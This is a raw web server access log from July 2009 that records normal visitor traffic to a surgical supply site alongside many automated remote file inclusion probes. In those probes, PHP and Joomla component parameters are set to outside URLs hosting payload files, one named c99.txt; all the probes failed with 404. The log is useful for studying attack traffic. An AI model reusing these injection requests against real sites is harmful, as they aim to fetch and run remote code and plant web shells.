69.59.21.101 - - [20/Jul/2009:03:51:08 -0400] "GET /errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:51:08 -0400] "GET /logs/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:51:12 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.169.189.169 - - [20/Jul/2009:03:51:15 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:03:51:17 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
209.59.12.99 - - [20/Jul/2009:03:51:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.59.21.101 - - [20/Jul/2009:03:51:35 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.146.100.148 - - [20/Jul/2009:03:52:16 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
75.146.100.148 - - [20/Jul/2009:03:52:16 -0400] "GET /logs/access_log.Q109060100%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.146.100.148 - - [20/Jul/2009:03:52:16 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:52:25 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.59.21.101 - - [20/Jul/2009:03:52:25 -0400] "GET /errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.59.21.101 - - [20/Jul/2009:03:52:25 -0400] "GET /logs/errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
119.152.60.174 - - [20/Jul/2009:03:52:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
119.152.60.174 - - [20/Jul/2009:03:52:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
119.152.60.174 - - [20/Jul/2009:03:52:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
119.152.60.174 - - [20/Jul/2009:03:52:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
121.169.189.169 - - [20/Jul/2009:03:53:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319D495FF4A7001B2203C+M37+ENG HTTP/1.1" 200 37540 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:03:53:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319D495FF4A7001B2203C+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:03:53:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319D4D503417007EB203C+M37+ENG HTTP/1.1" 200 37554 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319D495FF4A7001B2203C+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:03:53:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319D405C340700819203C+M37+ENG HTTP/1.1" 200 76692 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319D4D503417007EB203C+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:03:53:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319D4F5304A7008CB203C+M37+ENG HTTP/1.1" 200 45591 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:03:53:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319D4455D4F7009CA203C+M37+ENG HTTP/1.1" 200 40333 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319D4F5304A7008CB203C+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:03:53:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319D4455D4F7009CA203C+M37+ENG HTTP/1.1" 200 57416 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319D4F5304A7008CB203C+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
85.114.133.165 - - [20/Jul/2009:03:53:39 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
85.114.133.165 - - [20/Jul/2009:03:53:39 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.114.133.165 - - [20/Jul/2009:03:53:39 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
85.114.133.165 - - [20/Jul/2009:03:53:40 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:53:59 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.114.133.165 - - [20/Jul/2009:03:54:00 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.114.133.165 - - [20/Jul/2009:03:54:00 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:54:09 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:54:09 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:54:24 -0400] "GET /logs/access_log.Q109060100%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:54:25 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:54:25 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:54:36 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:54:36 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:54:36 -0400] "GET /logs/access_log.Q109060100%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.204.51.161 - - [20/Jul/2009:03:54:51 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.204.51.161 - - [20/Jul/2009:03:54:51 -0400] "GET /logs/errors.php?error=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
69.59.21.101 - - [20/Jul/2009:03:55:04 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:55:04 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.firearts.org/events/ws/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:55:16 -0400] "GET /errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.59.21.101 - - [20/Jul/2009:03:55:16 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.59.21.101 - - [20/Jul/2009:03:55:16 -0400] "GET /logs/errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.204.51.161 - - [20/Jul/2009:03:55:26 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
124.0.145.1 - - [20/Jul/2009:03:55:28 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:55:28 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:55:28 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:55:29 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:55:29 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:55:29 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:03:55:58 -0400] "GET /logs/access_log.Q109052200/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:55:59 -0400] "GET /admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:55:59 -0400] "GET /logs/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
61.78.62.84 - - [20/Jul/2009:03:56:11 -0400] "GET /logs/access_log.Q109061300//contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:56:11 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:56:11 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
63.147.72.145 - - [20/Jul/2009:03:56:17 -0400] "GET //config/dbutil.bck.php?confdir=http://juni0r.altervista.org/id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
63.147.72.145 - - [20/Jul/2009:03:56:17 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://juni0r.altervista.org/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
63.147.72.145 - - [20/Jul/2009:03:56:18 -0400] "GET /logs/access_log.Q109070300%20%20//config/dbutil.bck.php?confdir=http://juni0r.altervista.org/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:56:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.145.1 - - [20/Jul/2009:03:56:34 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.189.9.115 - - [20/Jul/2009:03:57:31 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.waawaa.com/Member/member.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.811"
213.189.9.115 - - [20/Jul/2009:03:57:31 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.waawaa.com/Member/member.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
213.189.9.115 - - [20/Jul/2009:03:57:31 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.waawaa.com/Member/member.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
213.189.9.115 - - [20/Jul/2009:03:57:31 -0400] "GET /logs/error_log.Q109052100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.waawaa.com/Member/member.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.811"
72.32.69.162 - - [20/Jul/2009:03:57:36 -0400] "GET /logs/access_log.Q109051200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.59.21.101 - - [20/Jul/2009:03:58:08 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://www.ohid.se/image?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
72.32.69.162 - - [20/Jul/2009:03:58:31 -0400] "GET /logs/access_log.Q109051200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
212.97.132.151 - - [20/Jul/2009:03:58:32 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
212.97.132.151 - - [20/Jul/2009:03:58:32 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
212.97.132.151 - - [20/Jul/2009:03:58:33 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
195.70.36.41 - - [20/Jul/2009:03:58:36 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
195.70.36.41 - - [20/Jul/2009:03:58:36 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
195.70.36.41 - - [20/Jul/2009:03:58:37 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
61.78.62.84 - - [20/Jul/2009:03:58:42 -0400] "GET /logs/access_log.Q109060100//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:03:58:51 -0400] "GET /logs/access_log.Q109051800/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:58:58 -0400] "GET /logs/access_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:58:58 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:58:58 -0400] "GET /logs/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:03:59:04 -0400] "GET /admin.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
72.32.69.162 - - [20/Jul/2009:03:59:06 -0400] "GET /logs/access_log.Q109051200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:59:06 -0400] "GET /logs/access_log.Q109052600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:59:08 -0400] "GET /logs/access_log.Q109052600//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.32.69.162 - - [20/Jul/2009:03:59:27 -0400] "GET /logs/access_log.Q109062500//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
207.58.130.206 - - [20/Jul/2009:03:59:37 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
207.58.130.206 - - [20/Jul/2009:03:59:37 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
207.58.130.206 - - [20/Jul/2009:03:59:37 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
211.15.55.45 - - [20/Jul/2009:03:59:41 -0400] "GET /logs/access_log.Q109052200/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:03:59:42 -0400] "GET /admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:03:59:42 -0400] "GET /logs/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
66.235.124.132 - - [20/Jul/2009:03:59:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [20/Jul/2009:03:59:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [20/Jul/2009:03:59:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
66.235.124.132 - - [20/Jul/2009:03:59:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
195.70.36.41 - - [20/Jul/2009:03:59:51 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:00:02 -0400] "GET /logs/access_log.Q109052200/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:00:02 -0400] "GET /logs/access_log.Q109052200/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:00:03 -0400] "GET /admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:00:03 -0400] "GET /admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:00:03 -0400] "GET /logs/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:00:03 -0400] "GET /logs/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
207.58.130.206 - - [20/Jul/2009:04:00:22 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
195.70.36.41 - - [20/Jul/2009:04:00:30 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:04:00:56 -0400] "GET /logs/access_log.Q109052600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
212.97.132.151 - - [20/Jul/2009:04:00:59 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
201.232.54.48 - - [20/Jul/2009:04:01:02 -0400] "GET /logs/access_log.Q109052200/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jul/2009:04:01:11 -0400] "GET /logs/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
72.32.69.162 - - [20/Jul/2009:04:01:17 -0400] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:04:01:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.169.189.169 - - [20/Jul/2009:04:01:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319D4053D42700AD9203C+M37+ENG HTTP/1.1" 200 57482 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319D4455D4F7009CA203C+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:01:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319F4E5994870051F203D+M37+ENG HTTP/1.1" 200 58078 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319D4053D42700AD9203C+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:01:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319F4253248700625203D+M37+ENG HTTP/1.1" 200 46206 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319F4E5994870051F203D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
82.195.150.228 - - [20/Jul/2009:04:02:04 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
75.146.100.148 - - [20/Jul/2009:04:02:14 -0400] "GET /logs/access_log.Q109060100//accounts/inc/include.php?language=0&lang_settings[0][1]=http://2006.aninite.at/mambots/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
